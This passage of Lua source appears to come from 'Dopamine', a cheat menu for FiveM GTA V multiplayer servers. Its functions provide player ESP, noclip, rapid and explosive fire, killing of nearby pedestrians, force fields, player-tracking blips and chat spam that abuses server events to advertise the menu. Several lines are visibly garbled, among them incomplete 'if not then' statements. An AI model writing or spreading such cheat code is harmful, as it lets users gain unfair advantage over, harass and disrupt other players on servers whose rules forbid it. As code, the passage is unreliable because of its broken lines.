- Dopamine.natives.setEntityCoords(Dopamine.datastore.pLocalPlayer.pedId, 2024.28, 3770.94, 32.18)
- elseif Dopamine.storedControls.selectedDisappearFromChase == 5 then
- Dopamine.natives.setEntityCoords(Dopamine.datastore.pLocalPlayer.pedId, -183.57, 6366.65, 31.47)
- end
- --[[Dopamine.natives.setEntityCoords(Dopamine.datastore.pLocalPlayer.pedId, -1729.98, -724.68, 9.84)]]
- local newDriver = CreatePedInsideVehicle(vehicle, 4, GetEntityModel(Dopamine.datastore.pLocalPlayer.pedId), -1, true, false)
- Dopamine.functions.sPO.clonePedOutfit(newDriver, Dopamine.datastore.pLocalPlayer.pedId)
- SetEntityAsMissionEntity(newDriver, 0, 0)
- TaskVehicleDriveToCoordLongrange(newDriver, vehicle, -34.552, -673.060, 31.944, 100.0, 537657916, 1.0)
- SetDriveTaskDrivingStyle(newDriver, 6)
- local vehicleModel = GetEntityModel(vehicle)
- local spawnedVehicle = Dopamine.functions.sPO.SpawnVehicleToPlayer(vehicleModel, PlayerId())
- local vehicleProperties =
- vehicleProperties.plate = nil
-, vehicleProperties)
- else
- Dopamine.pushNotification('Error getting your car')
- dir_print('vehicle entity doesnt exist')
- end
- else
- Dopamine.pushNotification('You\'re not in a vehicle')
- end
- end
- Dopamine.functions.vehicle2Step = function()
- p_flame_location = {
- 'exhaust',
- 'exhaust_2',
- 'exhaust_3',
- 'exhaust_4',
- 'exhaust_5',
- 'exhaust_6',
- 'exhaust_7',
- 'exhaust_8',
- 'exhaust_9',
- 'exhaust_10',
- 'exhaust_11',
- 'exhaust_12',
- 'exhaust_13',
- 'exhaust_14',
- 'exhaust_15',
- 'exhaust_16'
- }
- p_flame_particle = 'veh_backfire'
- p_flame_particle_asset = 'core'
- p_flame_size = 2.0
- if IsPedInAnyVehicle(GetPlayerPed(-1)) then
- local pedVehicle = GetVehiclePedIsIn(GetPlayerPed(-1))
- local pedPos = GetEntityCoords(GetPlayerPed(-1))
- local vehiclePos = GetEntityCoords(pedVehicle)
- local RPM = GetVehicleCurrentRpm(GetVehiclePedIsIn(GetPlayerPed(-1)))
- if GetPedInVehicleSeat(pedVehicle, -1) == GetPlayerPed(-1) then
- local BackFireDelay = (math.random(250, 750))
- local backFireSize = (math.random(2, 6) / 1.5)
- if RPM > 0.3 and RPM < 0.6 then
- for _,bones in pairs(p_flame_location) do
- if GetEntityBoneIndexByName(pedVehicle, bones) >= 0 then
- UseParticleFxAssetNextCall(p_flame_particle_asset)
- createdPart = StartParticleFxLoopedOnEntityBone(p_flame_particle, NetToVeh(VehToNet(pedVehicle)), 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, GetEntityBoneIndexByName(NetToVeh(VehToNet(pedVehicle)), bones), backFireSize--[[p_flame_size]], 0.0, 0.0, 0.0)
- StopParticleFxLooped(createdPart, 1)
- end
- end
- --[[Dopamine.natives.playSoundFrontend(-1, 'Jet_Explosions', 'exile_1', true)]]
- Dopamine.natives.addExplosion(vehiclePos.x, vehiclePos.y, vehiclePos.z, 61, 0.0, true, true, 0.0, true)
- Dopamine.datastore.pLocalPlayer.should2stepAutist = true
- pWait(BackFireDelay)
- else
- Dopamine.datastore.pLocalPlayer.should2stepAutist = false
- end
- end
- end
- end
- Dopamine.functions.maxUpgrades = function(veh)
- SetVehicleModKit(veh, 0)
- SetVehicleCustomPrimaryColour(Dopamine.datastore.pLocalPlayer.cVehicle, 0, 0, 0)
- SetVehicleCustomSecondaryColour(Dopamine.datastore.pLocalPlayer.cVehicle, 0, 0, 0)
- SetVehicleColours(veh, 12, 12)
- SetVehicleModColor_1(veh, 3, false)
- SetVehicleExtraColours(veh, 3, false)
- ToggleVehicleMod(veh, 18, true)
- ToggleVehicleMod(veh, 22, true)
- SetVehicleMod(veh, 16, 5, false)
- SetVehicleMod(veh, 12, 2, false)
- SetVehicleMod(veh, 11, 3, false)
- SetVehicleMod(veh, 14, 14, false)
- SetVehicleMod(veh, 15, 3, false)
- SetVehicleMod(veh, 13, 2, false)
- SetVehicleWindowTint(veh, 5)
- SetVehicleWheelType(veh, false)
- SetVehicleMod(veh, 23, 21, true)
- SetVehicleMod(veh, 0, 1, false)
- SetVehicleMod(veh, 1, 1, false)
- SetVehicleMod(veh, 2, 1, false)
- SetVehicleMod(veh, 3, 1, false)
- SetVehicleMod(veh, 4, 1, false)
- SetVehicleMod(veh, 5, 1, false)
- SetVehicleMod(veh, 6, 1, false)
- SetVehicleMod(veh, 7, 1, false)
- SetVehicleMod(veh, 8, 1, false)
- SetVehicleMod(veh, 9, 1, false)
- SetVehicleMod(veh, 10, 1, false)
- IsVehicleNeonLightEnabled(veh, true)
- SetVehicleNeonLightEnabled(veh, 0, true)
- SetVehicleNeonLightEnabled(veh, 1, true)
- SetVehicleNeonLightEnabled(veh, 2, true)
- SetVehicleNeonLightEnabled(veh, 3, true)
- SetVehicleNeonLightEnabled(veh, 4, true)
- SetVehicleNeonLightEnabled(veh, 5, true)
- SetVehicleNeonLightEnabled(veh, 6, true)
- SetVehicleNeonLightEnabled(veh, 7, true)
- SetVehicleNeonLightsColour(veh, Dopamine.mainColor.r, Dopamine.mainColor.g, Dopamine.mainColor.b)
- SetVehicleModKit(veh, 0)
- ToggleVehicleMod(veh, 20, true)
- SetVehicleModKit(veh, 0)
- SetVehicleTyreSmokeColor(veh, Dopamine.mainColor.r, Dopamine.mainColor.g, Dopamine.mainColor.b)
- SetVehicleNumberPlateTextIndex(veh, true)
- --[[Dopamine.functions.runParticle()]]
- end
- Dopamine.functions.maxPerformanceUpgrades = function(pVehicle)
- SetVehicleModKit(pVehicle, 0)
- SetVehicleMod(pVehicle, 11, GetNumVehicleMods(pVehicle, 11) - 1, false)
- SetVehicleMod(pVehicle, 12, GetNumVehicleMods(pVehicle, 12) - 1, false)
- SetVehicleMod(pVehicle, 13, GetNumVehicleMods(pVehicle, 13) - 1, false)
- SetVehicleMod(pVehicle, 15, GetNumVehicleMods(pVehicle, 15) - 2, false)
- SetVehicleMod(pVehicle, 16, GetNumVehicleMods(pVehicle, 16) - 1, false)
- ToggleVehicleMod(pVehicle, 17, true)
- ToggleVehicleMod(pVehicle, 18, true)
- ToggleVehicleMod(pVehicle, 19, true)
- ToggleVehicleMod(pVehicle, 21, true)
- end
- Dopamine.functions.spawnVehicle = function(vehicle_model)
- local x, y, z = table.unpack(GetOffsetFromEntityInWorldCoords(PlayerPedId(-1), 0.0, 8.0, 0.5))
- local veh = vehicle_model
- if veh == nil then
- veh = 'elegy'
- end
- local vehiclehash = GetHashKey(veh)
- RequestModel(vehiclehash)
- pCreateThread(function()
- local timeout = 0
- while not HasModelLoaded(vehiclehash) do
- timeout = timeout + 100
- pWait(100)
- if timeout > 5000 then
- Dopamine.pushNotification('Could not spawn this vehicle!', 5000)
- break
- end
- end
- local SpawnedCar = Dopamine.natives.createVehicle(vehiclehash, x, y, z, GetEntityHeading(PlayerPedId(-1)) + 90, 1, 0)
- SetVehicleStrong(SpawnedCar, true)
- SetVehicleEngineOn(SpawnedCar, true, true, false)
- SetVehicleEngineCanDegrade(SpawnedCar, false)
- if Dopamine.storedControls.vehSpawnUpgraded then
- Dopamine.functions.maxUpgrades(SpawnedCar)
- end
- if Dopamine.storedControls.vehSpawnInside then
- SetPedIntoVehicle(Dopamine.datastore.pLocalPlayer.pedId, SpawnedCar, -1)
- end
- --[[Dopamine.functions.runParticle()]]
- end)
- end
- Dopamine.functions.spawnCustomVehicle = function(data)
- pCreateThread(function()
- local timeout = 0
- if data.hash == nil then data.hash = 'elegy' end
- if not data.coords then data.coords = GetEntityCoords(Dopamine.datastore.pLocalPlayer.pedId) end
- RequestModel(data.hash)
- while not HasModelLoaded(data.hash) do
- timeout = timeout + 100
- pWait(100)
- if timeout > 5000 then
- Dopamine.functions.sendNotification('Could not spawn this vehicle!')
- break
- end
- end
- local spawnedCar = Dopamine.natives.createVehicle(data.hash, data.coords, GetEntityHeading(Dopamine.datastore.pLocalPlayer.pedId), true, true)
- SetVehicleStrong(spawnedCar, true)
- SetVehicleEngineOn(spawnedCar, true, true, false)
- SetVehicleEngineCanDegrade(spawnedCar, false)
- if not then
- SetVehicleNumberPlateText(spawnedCar, data.plate)
- end
- if Dopamine.storedControls.vehSpawnUpgraded then
- Dopamine.functions.maxUpgrades(spawnedCar)
- end
- if data.setIn then
- SetPedIntoVehicle(Dopamine.datastore.pLocalPlayer.pedId, spawnedCar, -1)
- end
- if data.props then
-, data.props)
- end
- end)
- end
- Dopamine.functions.customBullet = function()
- function rotDirection(rot)
- local radianz = rot.z * 0.0174532924
- local radianx = rot.x * 0.0174532924
- local num = math.abs(math.cos(radianx))
- local dir = vector3(-math.sin(radianz) * num, math.cos(radianz) * num, math.sin(radianx))
- return dir
- end
- pCreateThread(function()
- local startDistance = Dopamine.trashFunctions.getDistance(GetGameplayCamCoord(), GetEntityCoords(Dopamine.datastore.pLocalPlayer.pedId, true))
- local endDistance = Dopamine.trashFunctions.getDistance(GetGameplayCamCoord(), GetEntityCoords(Dopamine.datastore.pLocalPlayer.pedId, true))
- startDistance = startDistance + 0.25
- endDistance = endDistance + 1000.0
- if IsPedShooting(Dopamine.datastore.pLocalPlayer.pedId) then
- local bullet = GetHashKey(Dopamine.menuTables.weaponsCustomBullet.actual)
- if not HasWeaponAssetLoaded(bullet) then
- RequestWeaponAsset(bullet, 31, false)
- while not HasWeaponAssetLoaded(bullet) do
- pWait(0)
- end
- end
- Dopamine.natives.shootSingleBulletBetweenCoords(Dopamine.trashFunctions.addVector(GetGameplayCamCoord(), Dopamine.trashFunctions.multiplyVector(rotDirection(GetGameplayCamRot(0)), startDistance)).x,
- Dopamine.trashFunctions.addVector(GetGameplayCamCoord(), Dopamine.trashFunctions.multiplyVector(rotDirection(GetGameplayCamRot(0)), startDistance)).y, Dopamine.trashFunctions.addVector(GetGameplayCamCoord(),
- Dopamine.trashFunctions.multiplyVector(rotDirection(GetGameplayCamRot(0)), startDistance)).z, Dopamine.trashFunctions.addVector(GetGameplayCamCoord(), Dopamine.trashFunctions.multiplyVector(rotDirection(GetGameplayCamRot(0)), endDistance)).x,
- Dopamine.trashFunctions.addVector(GetGameplayCamCoord(), Dopamine.trashFunctions.multiplyVector(rotDirection(GetGameplayCamRot(0)), endDistance)).y, Dopamine.trashFunctions.addVector(GetGameplayCamCoord(),
- Dopamine.trashFunctions.multiplyVector(rotDirection(GetGameplayCamRot(0)), endDistance)).z, 250, true, bullet, Dopamine.datastore.pLocalPlayer.pedId, true, false, -1.0)
- end
- end)
- end
- Dopamine.functions.rapidFireTick = function()
- if Dopamine.natives.isDisabledControlPressed(0, Keys['MOUSE1']) then
- local _, weapon = GetCurrentPedWeapon(Dopamine.datastore.pLocalPlayer.pedId)
- local launchPos = GetEntityCoords(GetCurrentPedWeaponEntityIndex(Dopamine.datastore.pLocalPlayer.pedId))
- local targetPos = GetGameplayCamCoord() + (GetCamDirFromScreenCenter() * 200.0)
- ClearAreaOfProjectiles(launchPos, 0.0, 1)
- Dopamine.natives.shootSingleBulletBetweenCoords(launchPos, targetPos, 5, 1, weapon, Dopamine.datastore.pLocalPlayer.pedId, true, true, 24000.0)
- if Dopamine.storedControls.weapExplosiveAmmo then
- Dopamine.natives.shootSingleBulletBetweenCoords(launchPos, targetPos, 5, 1, 'WEAPON_GRENADE', Dopamine.datastore.pLocalPlayer.pedId, true, true, 24000.0)
- end
- end
- end
- Dopamine.functions.toggleESP = function()
- local _,x,y = false, 0.0, 0.0
- pCreateThread(function()
- while Dopamine.storedControls.visESPEnable and Dopamine.shouldShowMenu do
- local plist = Dopamine.natives.getActivePlayers()
- Dopamine.trashFunctions.table_removekey(plist, PlayerId())
- for i = 1, #plist do
- local targetCoords = GetEntityCoords(GetPlayerPed(plist[i]))
- _, x, y = GetScreenCoordFromWorldCoord(targetCoords.x, targetCoords.y, targetCoords.z)
- local distance = GetDistanceBetweenCoords(GetEntityCoords(Dopamine.datastore.pLocalPlayer.pedId), targetCoords)
- if distance <= Dopamine.storedControls.visualsESPDistance then
- local _we, wephash = GetCurrentPedWeapon(GetPlayerPed(plist[i]), 1)
- local wepname = Dopamine.trashFunctions.weaponNameFromHash(wephash)
- local vehname = 'On Foot'
- if IsPedInAnyVehicle(GetPlayerPed(plist[i]), 0) then
- vehname = GetLabelText(GetDisplayNameFromVehicleModel(GetEntityModel(GetVehiclePedIsUsing(GetPlayerPed(plist[i])))))
- end
- if wepname == nil then wepname = 'Unknown' end
- local espstring1 = ''
- local espstring2 = ''
- if Dopamine.storedControls.visESPShowID then
- espstring1 = espstring1..'~s~ | ~w~ID: ~s~' .. GetPlayerServerId(plist[i])
- end
- if Dopamine.storedControls.visESPShowName then
- espstring1 = espstring1..'~s~ | ~w~Name: ~s~' .. GetPlayerName(plist[i])
- end
- if Dopamine.storedControls.visESPShowDistance then
- espstring1 = espstring1..'~s~ | ~w~Distance: ~s~' .. math.floor(distance)..'~s~ |'
- end
- if Dopamine.storedControls.visESPShowWeapon then
- espstring2 = espstring2..'~s~ | ~w~Weapon: ~s~' .. wepname
- end
- if Dopamine.storedControls.visESPShowVehicle then
- espstring2 = espstring2..'~s~ | ~w~Vehicle: ~s~' .. vehname
- end
- Dopamine.DrawTxt(espstring1, x - 0.04, y - 0.04, 0.0, 0.3, Dopamine.mainColor)
- Dopamine.DrawTxt(espstring2, x - 0.04, y - 0.03, 0.0, 0.3, Dopamine.mainColor)
- end
- end
- pWait(Dopamine.storedControls.visualsESPRefreshRate)
- end
- end)
- end
- Dopamine.functions.toggleNoclip = function()
- Dopamine.storedControls.noClip = not Dopamine.storedControls.noClip
- if not Dopamine.storedControls.noClip then
- SetEntityRotation(Dopamine.datastore.pLocalPlayer.cVehicle, GetGameplayCamRot(2), 2, 1)
- end
- end
- Dopamine.functions.getCamDirection = function()
- local heading = GetGameplayCamRelativeHeading() + GetEntityHeading(Dopamine.datastore.pLocalPlayer.pedId)
- local pitch = GetGameplayCamRelativePitch()
- local x = -math.sin(heading * math.pi / 180.0)
- local y = math.cos(heading * math.pi / 180.0)
- local z = math.sin(pitch * math.pi / 180.0)
- local len = math.sqrt(x * x + y * y + z * z)
- if len ~= 0 then
- x = x / len
- y = y / len
- z = z / len
- end
- return x, y, z
- end
- Dopamine.functions.getSeatPedIsIn = function(ped)
- if not IsPedInAnyVehicle(ped, false) then
- return
- else
- veh = GetVehiclePedIsIn(ped)
- for i = 0, GetVehicleMaxNumberOfPassengers(veh) do
- if GetPedInVehicleSeat(veh) then return i end
- end
- end
- end
- Dopamine.functions.noclipAdv = function()
- local noclipSpeed = 5
- local oldnoclipSpeed = 5
- local isInVehicle = IsPedInAnyVehicle(Dopamine.datastore.pLocalPlayer.pedId, 0)
- local k = nil
- local x, y, z = nil
- if not isInVehicle then
- k = Dopamine.datastore.pLocalPlayer.pedId
- x, y, z = table.unpack(GetEntityCoords(Dopamine.datastore.pLocalPlayer.pedId, 2))
- else
- k = Dopamine.datastore.pLocalPlayer.cVehicle
- x, y, z = table.unpack(GetEntityCoords(Dopamine.datastore.pLocalPlayer.pedId, 1))
- end
- if isInVehicle and Dopamine.functions.getSeatPedIsIn(Dopamine.datastore.pLocalPlayer.pedId) ~= -1 then Dopamine.trashFunctions.reqControlOnce(k) end
- local dx, dy, dz = Dopamine.functions.getCamDirection()
- --[[Dopamine.natives.setEntityVisible(Dopamine.datastore.pLocalPlayer.pedId, 0, 0)
- Dopamine.natives.setEntityVisible(k, 0, 0)]]
- SetEntityVelocity(k, 0.0001, 0.0001, 0.0001)
- if IsDisabledControlJustPressed(0, Keys['LEFTSHIFT']) then --[[ Change speed]]
- oldnoclipSpeed = noclipSpeed
- noclipSpeed = noclipSpeed * 2
- end
- if IsDisabledControlJustReleased(0, Keys['LEFTSHIFT']) then --[[ Restore speed]]
- noclipSpeed = oldnoclipSpeed
- end
- if Dopamine.natives.isDisabledControlPressed(0, 32) then --[[ MOVE FORWARD]]
- x = x + noclipSpeed * dx
- y = y + noclipSpeed * dy
- z = z + noclipSpeed * dz
- end
- if Dopamine.natives.isDisabledControlPressed(0, 269) then --[[ MOVE BACK]]
- x = x - noclipSpeed * dx
- y = y - noclipSpeed * dy
- z = z - noclipSpeed * dz
- end
- if Dopamine.natives.isDisabledControlPressed(0, Keys['SPACE']) then --[[ MOVE UP]]
- z = z + noclipSpeed
- end
- if Dopamine.natives.isDisabledControlPressed(0, Keys['LEFTCTRL']) then --[[ MOVE DOWN]]
- z = z - noclipSpeed
- end
- Dopamine.natives.setEntityCoordsNoOffset(k, x, y, z, true, true, true)
- end
- Dopamine.functions.magnetoMode = function()
- if Dopamine.storedControls.magnetoMode then
- pCreateThread(function()
- local ForceKey = Keys[Dopamine.keyBinds.currentKeybindMagneto.handle]
- local Force = 0.5
- local KeyPressed = false
- local KeyTimer = 0
- local KeyDelay = 15
- local ForceEnabled = false
- local StartPush = false
- local function forceMagnetoTick()
- if (KeyPressed) then
- KeyTimer = KeyTimer + 1
- if (KeyTimer >= KeyDelay) then
- KeyTimer = 0
- KeyPressed = false
- end
- end
- if Dopamine.natives.isDisabledControlPressed(0, ForceKey) and not KeyPressed and not ForceEnabled then
- KeyPressed = true
- ForceEnabled = true
- end
- if (StartPush) then
- StartPush = false
- local pid = Dopamine.datastore.pLocalPlayer.pedId
- local CamRot = GetGameplayCamRot(2)
- local force = 5
- local Fx = -(math.sin(math.rad(CamRot.z)) * force * 10)
- local Fy = (math.cos(math.rad(CamRot.z)) * force * 10)
- local Fz = force * (CamRot.x * 0.2)
- local PlayerVeh = GetVehiclePedIsIn(pid, false)
- for k in Dopamine.trashFunctions.enumVehicles() do
- SetEntityInvincible(k, false)
- if IsEntityOnScreen(k) and k ~= PlayerVeh then
- ApplyForceToEntity(k, 1, Fx, Fy, Fz, 0, 0, 0, true, false, true, true, true, true)
- end
- end
- for k in Dopamine.trashFunctions.enumPeds() do
- if IsEntityOnScreen(k) and k ~= pid then
- ApplyForceToEntity(k, 1, Fx, Fy, Fz, 0, 0, 0, true, false, true, true, true, true)
- end
- end
- end
- if Dopamine.natives.isDisabledControlPressed(0, ForceKey) and not KeyPressed and ForceEnabled then
- KeyPressed = true
- StartPush = true
- ForceEnabled = false
- end
- if (ForceEnabled) then
- local pid = Dopamine.datastore.pLocalPlayer.pedId
- local PlayerVeh = GetVehiclePedIsIn(pid, false)
- Markerloc = GetGameplayCamCoord() + (Dopamine.trashFunctions.rotationToDirection(GetGameplayCamRot(2)) * 20)
- DrawMarker(28, Markerloc, 0.0, 0.0, 0.0, 0.0, 180.0, 0.0, 1.0, 1.0, 1.0, Dopamine.mainColor.r, Dopamine.mainColor.g, Dopamine.mainColor.b, 35, false, true, 2, nil, nil, false)
- for k in Dopamine.trashFunctions.enumVehicles() do
- SetEntityInvincible(k, true)
- if IsEntityOnScreen(k) and (k ~= PlayerVeh) then
- Dopamine.trashFunctions.reqControlOnce(k)
- FreezeEntityPosition(k, false)
- Dopamine.trashFunctions.forceOscillate(k, Markerloc, 0.5, 0.3)
- end
- end
- for k in Dopamine.trashFunctions.enumPeds() do
- if IsEntityOnScreen(k) and k ~= Dopamine.datastore.pLocalPlayer.pedId then
- Dopamine.trashFunctions.reqControlOnce(k)
- SetPedToRagdoll(k, 4000, 5000, 0, true, true, true)
- FreezeEntityPosition(k, false)
- Dopamine.trashFunctions.forceOscillate(k, Markerloc, 0.5, 0.3)
- end
- end
- end
- end
- while Dopamine.storedControls.magnetoMode do forceMagnetoTick() pWait(0) end
- end)
- end
- end
- Dopamine.functions.applyShockwave = function(entity, force)
- if not force then force = 50 end
- local pos = GetEntityCoords(Dopamine.datastore.pLocalPlayer.pedId)
- local coord = GetEntityCoords(entity)
- local dx = coord.x - pos.x
- local dy = coord.y - pos.y
- local dz = coord.z - pos.z
- local distance = math.sqrt(dx * dx + dy * dy + dz * dz)
- local distanceRate = (force / distance) * math.pow(1.04, 1 - distance)
- ApplyForceToEntity(entity, 1, distanceRate * dx, distanceRate * dy, distanceRate * dz, math.random() * math.random(1, 10), math.random() * math.random(-1, 1), math.random() * math.random(-1, 1), true, false, true, true, true, true)
- end
- Dopamine.functions.doForceFieldTick = function(radius)
- local player = Dopamine.datastore.pLocalPlayer.pedId
- local coords = GetEntityCoords(Dopamine.datastore.pLocalPlayer.pedId)
- local playerVehicle = GetPlayersLastVehicle()
- local inVehicle = IsPedInVehicle(player, playerVehicle, true)
- DrawMarker(28, coords.x, coords.y, coords.z, 0.0, 0.0, 0.0, 0.0, 180.0, 0.0, radius, radius, radius, 180, 80, 0, 35, false, true, 2, nil, nil, false)
- for k in Dopamine.trashFunctions.enumVehicles() do
- if (not inVehicle or k ~= playerVehicle) and GetDistanceBetweenCoords(coords, GetEntityCoords(k)) <= radius * 1.2 then
- Dopamine.trashFunctions.reqControlOnce(k)
- Dopamine.functions.applyShockwave(k, 50)
- end
- end
- for k in Dopamine.trashFunctions.enumPeds() do
- if k ~= Dopamine.datastore.pLocalPlayer.pedId and GetDistanceBetweenCoords(coords, GetEntityCoords(k)) <= radius * 1.2 and not IsPedAPlayer(k) then
- Dopamine.trashFunctions.reqControlOnce(k)
- if NetworkHasControlOfEntity(k) then
- SetPedRagdollOnCollision(k, true)
- SetPedRagdollForceFall(k)
- Dopamine.functions.applyShockwave(k, 50)
- end
- end
- end
- end
- Dopamine.functions.randomClothes = function(target)
- pCreateThread(function()
- local ped = GetPlayerPed(target)
- SetPedRandomComponentVariation(ped, false)
- SetPedRandomProps(ped)
- end)
- end
- Dopamine.functions.spawnRandomTrain = function()
- if Dopamine.datastore.trainRide.handle then
- DeleteMissionTrain(Dopamine.datastore.trainRide.handle)
- Dopamine.datastore.trainRide.trainSpeed = 5.0
- dir_print('Deleted train')
- Dopamine.datastore.trainRide.handle = nil
- Dopamine.datastore.trainRide.handleHasLoaded = false
- pWait(100)
- if Dopamine.datastore.trainRide.oldCoords then
- Dopamine.functions.teleportSelf(Dopamine.datastore.trainRide.oldCoords.x, Dopamine.datastore.trainRide.oldCoords.y, Dopamine.datastore.trainRide.oldCoords.z)
- end
- else
- Dopamine.datastore.trainRide.oldCoords = GetEntityCoords(Dopamine.datastore.pLocalPlayer.pedId)
- local cablecar = GetHashKey('cablecar')
- local metrotrain = GetHashKey('metrotrain')
- local freight = GetHashKey('freight')
- local freightcar = GetHashKey('freightcar')
- local freightgrain = GetHashKey('freightgrain')
- local freightcont1 = GetHashKey('freightcont1')
- local freightcont2 = GetHashKey('freightcont2')
- local freighttrailer = GetHashKey('freighttrailer')
- RequestModel(cablecar)
- RequestModel(metrotrain)
- RequestModel(freight)
- RequestModel(freightcar)
- RequestModel(freightgrain)
- RequestModel(freightcont1)
- RequestModel(freightcont2)
- RequestModel(freighttrailer)
- while (not HasModelLoaded(cablecar)) do pWait(0) end
- while (not HasModelLoaded(metrotrain)) do pWait(0) end
- while (not HasModelLoaded(freight)) do pWait(0) end
- while (not HasModelLoaded(freightcar)) do pWait(0) end
- while (not HasModelLoaded(freightgrain)) do pWait(0) end
- while (not HasModelLoaded(freightcont1)) do pWait(0) end
- while (not HasModelLoaded(freightcont2)) do pWait(0) end
- while (not HasModelLoaded(freighttrailer)) do pWait(0) end
- local c = GetEntityCoords(Dopamine.datastore.pLocalPlayer.pedId, false)
- Dopamine.datastore.trainRide.handle = CreateMissionTrain(24, c.x, c.y, c.z, 1)
- SetVehicleUndriveable(Dopamine.datastore.trainRide.handle, false)
- TaskWarpPedIntoVehicle(Dopamine.datastore.pLocalPlayer.pedId, Dopamine.datastore.trainRide.handle, -1)
- dir_print('Spawned train')
- Dopamine.datastore.trainRide.handleHasLoaded = true
- end
- if Dopamine.datastore.trainRide.handleHasLoaded then
- if (Dopamine.datastore.pLocalPlayer.cVehicle == Dopamine.datastore.trainRide.handle) then
- local message = 'Train speed: ~b~' .. tostring(Dopamine.datastore.trainRide.trainSpeed)
- if (GetGameTimer() >= timer) then
- SetTrainSpeed(Dopamine.datastore.trainRide.handle, Dopamine.datastore.trainRide.trainSpeed)
- timer = GetGameTimer() + 10
- end
- if (IsDisabledControlJustReleased(1, Keys['UP'])) then
- Dopamine.datastore.trainRide.trainSpeed = Dopamine.datastore.trainRide.trainSpeed + 0.1
- elseif (IsDisabledControlJustReleased(1, Keys['DOWN'])) then
- if (Dopamine.datastore.trainRide.trainSpeed - 0.1 >= 0.0) then
- Dopamine.datastore.trainRide.trainSpeed = Dopamine.datastore.trainRide.trainSpeed - 0.1
- end
- end
- end
- end
- end
- Dopamine.functions.spamChat = function(message)
- if then message = 'www.d0pamine |' end
- for colorLoop=2,6 do
- Dopamine.dTCE(true, true, '_chat:messageEntered','d0pamine', {Dopamine.mainColor.r,Dopamine.mainColor.g,Dopamine.mainColor.b},'^'..colorLoop..message)
- if Dopamine.functions.doesResourceExist('esx_rpchat') then
- Dopamine.dTCE(true, true, '_chat:messageEntered','d0pamine', {Dopamine.mainColor.r,Dopamine.mainColor.g,Dopamine.mainColor.b},'/ooc ^'..colorLoop..message)
- Dopamine.dTCE(true, true, '_chat:messageEntered','d0pamine', {Dopamine.mainColor.r,Dopamine.mainColor.g,Dopamine.mainColor.b},'/ad ^'..colorLoop..message)
- end
- end
- end
- Dopamine.functions.resetAppearance = function()
- ClearAllPedProps(Dopamine.datastore.pLocalPlayer.pedId)
- ClearPedDecorations(Dopamine.datastore.pLocalPlayer.pedId)
- SetPedComponentVariation(Dopamine.datastore.pLocalPlayer.pedId, 1, 0, 0, 0)
- SetPedComponentVariation(Dopamine.datastore.pLocalPlayer.pedId, 5, 0, 0, 0)
- SetPedComponentVariation(Dopamine.datastore.pLocalPlayer.pedId, 9, 0, 0, 0)
- end
- Dopamine.functions.changeAppearance = function(family, model, texture)
- if (family == 'HATS' or family == 'GLASSES' or family == 'EARS') then
- if (family == 'HATS') then
- fam = 0
- elseif (family == 'GLASSES') then
- fam = 1
- elseif (family == 'EARS') then
- fam = 2
- end
- SetPedPropIndex(Dopamine.datastore.pLocalPlayer.pedId, fam, model - 1, texture, 1)
- else
- if (family == 'FACE') then
- fam = 0
- elseif (family == 'MASK') then
- fam = 1
- elseif (family == 'HAIR') then
- fam = 2
- elseif (family == 'TORSO') then
- fam = 3
- elseif (family == 'LEGS') then
- fam = 4
- elseif (family == 'HANDS') then
- fam = 5
- elseif (family == 'SHOES') then
- fam = 6
- elseif (family == 'SPECIAL1') then
- fam = 7
- elseif (family == 'SPECIAL2') then
- fam = 8
- elseif (family == 'SPECIAL3') then
- fam = 9
- elseif (family == 'TEXTURE') then
- fam = 10
- elseif (family == 'TORSO2') then
- fam = 11
- end
- SetPedComponentVariation(Dopamine.datastore.pLocalPlayer.pedId, fam, model, texture, 0)
- end
- end
- Dopamine.functions.killNearbyPeds = function()
- local playerPed = Dopamine.datastore.pLocalPlayer.pedId
- local PedTab, PedCount = GetPedNearbyPeds(playerPed, 30, 30)
- for p in Dopamine.trashFunctions.enumPeds() do
- if p ~= playerPed and not IsPedAPlayer(p) then
- Dopamine.natives.setEntityHealth(p, 0)
- ExplodePedHead(p, GetHashKey('WEAPON_NIGHTSTICK'))
- SetPedToRagdoll(p, 6, 20, 20, true, true, true)
- end
- end
- end
- Dopamine.functions.playerBlips = function()
- if Dopamine.storedControls.visPlayerBlips then
- local plist = Dopamine.natives.getActivePlayers()
- for i = 1, #plist do
- local id = plist[i]
- local ped = GetPlayerPed(id)
- if ped ~= Dopamine.datastore.pLocalPlayer.pedId then
- local blip = GetBlipFromEntity(ped)
- Create head display (this is safe to be spammed)
- headId = pInvoke( 0xBFEFE3321A3F5015, ped, GetPlayerName( id ), false, false, '', false )
- Speaking display
- I need to move this over to name tag code
- if NetworkIsPlayerTalking(id) then
- pInvoke( 0x63BB75ABEDC1F6A0, headId, 9, true )
- else
- pInvoke( 0x63BB75ABEDC1F6A0, headId, 9, false )
- end]]
- if not DoesBlipExist(blip) then
- blip = AddBlipForEntity(ped)
- SetBlipSprite(blip, 1)
- pInvoke( 0x5FBCA48327B914DF, blip, true )
- else
- local veh = GetVehiclePedIsIn(ped, false)
- local blipSprite = GetBlipSprite(blip)
- if GetEntityHealth(ped) == 0 then
- if blipSprite ~= 274 then
- SetBlipSprite(blip, 274)
- pInvoke( 0x5FBCA48327B914DF, blip, true )
- end
- elseif veh then
- local vehClass = GetVehicleClass(veh)
- local vehModel = GetEntityModel(veh)
- if vehClass == 15 then
- if blipSprite ~= 422 then
- SetBlipSprite(blip, 422)
- pInvoke( 0x5FBCA48327B914DF, blip, true)
- end
- elseif vehClass == 8 then
- if blipSprite ~= 226 then
- SetBlipSprite(blip, 226)
- pInvoke( 0x5FBCA48327B914DF, blip, true)
- end
- elseif vehClass == 16 then
- if vehModel == GetHashKey('besra') or vehModel == GetHashKey('hydra') or vehModel == GetHashKey('lazer') then
- if blipSprite ~= 424 then
- SetBlipSprite(blip, 424)
- pInvoke( 0x5FBCA48327B914DF, blip, true)
- end
- elseif blipSprite ~= 423 then
- SetBlipSprite(blip, 423)
- pInvoke( 0x5FBCA48327B914DF, blip, true)
- end
- elseif vehClass == 14 then
- if blipSprite ~= 427 then
- SetBlipSprite(blip, 427)
- pInvoke( 0x5FBCA48327B914DF, blip, true)
- end
- elseif vehModel == GetHashKey('insurgent') or vehModel == GetHashKey('insurgent2') or vehModel == GetHashKey('insurgent3') then
- if blipSprite ~= 426 then
- SetBlipSprite(blip, 426)
- pInvoke( 0x5FBCA48327B914DF, blip, true)
- end
- elseif vehModel == GetHashKey('limo2') then
- if blipSprite ~= 460 then
- SetBlipSprite(blip, 460)
- pInvoke( 0x5FBCA48327B914DF, blip, true)
- end
- elseif vehModel == GetHashKey('rhino') then
- if blipSprite ~= 421 then
- SetBlipSprite(blip, 421)
